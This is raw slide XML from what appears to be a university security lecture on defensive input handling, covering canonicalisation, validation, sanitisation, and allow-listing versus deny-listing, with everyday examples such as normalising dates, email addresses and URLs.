              <a:t>Canonicalisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Validation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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sanitisation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071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7A57B-BD83-DB78-666C-5F7D56F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big three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71A705-78C5-A8EC-322E-FE88EA48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Last lecture: three big three classes of security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memory corruption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access control   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>incl.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authentication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insecure input handling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, esp. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>injection attacks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Today &amp; next week : closer look at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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Some more input problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Structural solutions to input problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0"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3CE7-4652-E7EC-9436-2877552EC2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123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990656" cy="49601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u="sng" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Canonicalisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>normalise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> inputs to canonical form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    E.g.  convert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10-31-2021</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  to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31/10/2021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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    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                             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www.ru.nl/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  to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www.ru.nl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J.Smith@Gmail.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to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jsmith@gmail.com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u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Validation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  ‘invalid’ inputs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1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    E.g. reject  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>May 32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 2024</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  or  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>negative amounts</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="16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u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sanitisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fix  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘dangerous’ inputs  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1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   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> E.g.  convert  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 </a:t>
            </a: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to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GB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lt;script&amp;gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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          Many synonyms: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>escaping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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>encoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> filtering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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>neutralising, ..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Invalid inputs could be fixed instead of rejected as part of validation.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1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Which of these operations should be done first?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Canonicalisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, Validation, Sanitisation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40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rechteraccolade 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6156176" y="2708920"/>
            <a:ext cx="266353" cy="1656184"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2" fmla="val 5180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48802" y="2921168"/>
            <a:ext cx="258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Beware: validation &amp; sanitisation are</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="20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often confused !</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34267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a)   Canonicalisation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2400" dirty="0"/>
              <a:t>(aka Normalisation)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1569"/>
            <a:ext cx="7918648" cy="51268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err="1"/>
              <a:t>There</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>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i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>many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dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ways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write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same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thing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t>, eg.                      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upper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1"/>
              <a:t>lowercase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t> letters   eg   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s123456</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1"/>
              <a:t>vs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t>  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S123456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trailing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1"/>
              <a:t>spaces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t>                           eg  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s123456  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1"/>
              <a:t>vs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t>  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s123456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trailing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t> 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600" dirty="0"/>
              <a:t>  in a domain name, eg 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www.ru.nl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trailing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t> 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l-NL" sz="1600" dirty="0"/>
              <a:t>  in a domain name, eg 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www.ru.nl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 err="1"/>
              <a:t>ignored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1"/>
              <a:t>characters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t> or sub-strings, eg in email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1"/>
              <a:t>addresses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t>: 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name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+redundantstring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@bla.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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 .  ~ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1"/>
              <a:t>path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1"/>
              <a:t>names</a:t>
            </a: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/>
              <a:t>file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1"/>
              <a:t>URLs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t>           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file://127.0.0.1/c|WINDOWS/clock.avi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using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1"/>
              <a:t>either</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t>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600" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL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l-NL" sz="1600" dirty="0"/>
              <a:t> in a URL on Windows  </a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="16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nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unicode encoding                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t>eg  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600" dirty="0"/>
              <a:t>  encoded as  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL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\u002f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/>
              <a:t>Beware: some forms of encoding are not meant as form of sanitisation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3631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a)  Canonicalisation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10" y="1116013"/>
            <a:ext cx="7761288" cy="5132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800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>should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always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be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> put </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>into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canonical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> form                            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>before</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>any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further</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> processing, esp.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>before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dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>validation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nl-NL" sz="1800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>before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en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>using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the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> data in  security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>decisions</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL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nl-NL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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>But: the canonicalisation operation itself may be abused,                         for instance to waste CPU cycles or memory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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eg with a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>zip bomb </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XML bomb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nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Btw: a docx file is a zip file!)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51272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b) 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Many possible forms of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>patterns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0"/>
              <a:t> for validations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t>Eg. for numbers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>positive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>negative</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, max. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>possible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t> range?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>Luhn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t> mod 10 check for credit card numbers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t>Eg. for strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty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nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(dis)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>allowed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>characters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>words</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="339933"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t>More precise: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>regular expressions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> context-free grammars</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1"/>
              <a:t>Eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0"/>
              <a:t> for  RU student number (s followed by 6 digits),   valid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t>email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" err="1"/>
              <a:t>address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t>, URL, …</a:t>
            </a:r>
          </a:p>
          <a:p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600" dirty="0"/>
              <a:t>Unfortunately, regular expressions and context-free grammars are not expressive enough </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>for many complex input formats </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0"/>
              <a:t>(eg email address, JPG, PDF,...)  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" b="1" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p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693383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b) Validation techniques</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nl-NL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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Indirect selection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Let user choose from a set of legitimate inputs;                                                        User input never used directly by the application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Most secure, but cannot be used in all situations;                                  also, attacker may be able to by-pass the user interface to still enter invalid data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> by messing with HTTP traffic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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Allow-listing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(aka white-listing)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List </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>valid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> patterns; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>accept</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> input if it matches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Instance of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>positive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> security model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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deny-listing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(aka black-listing)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List </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>invalid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  patterns; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>reject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nl-NL" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> input if  it matches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Least secure, given the big risk that some dangerous patterns are overlooked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Instance of a </a:t>
            </a:r>
            <a:r>
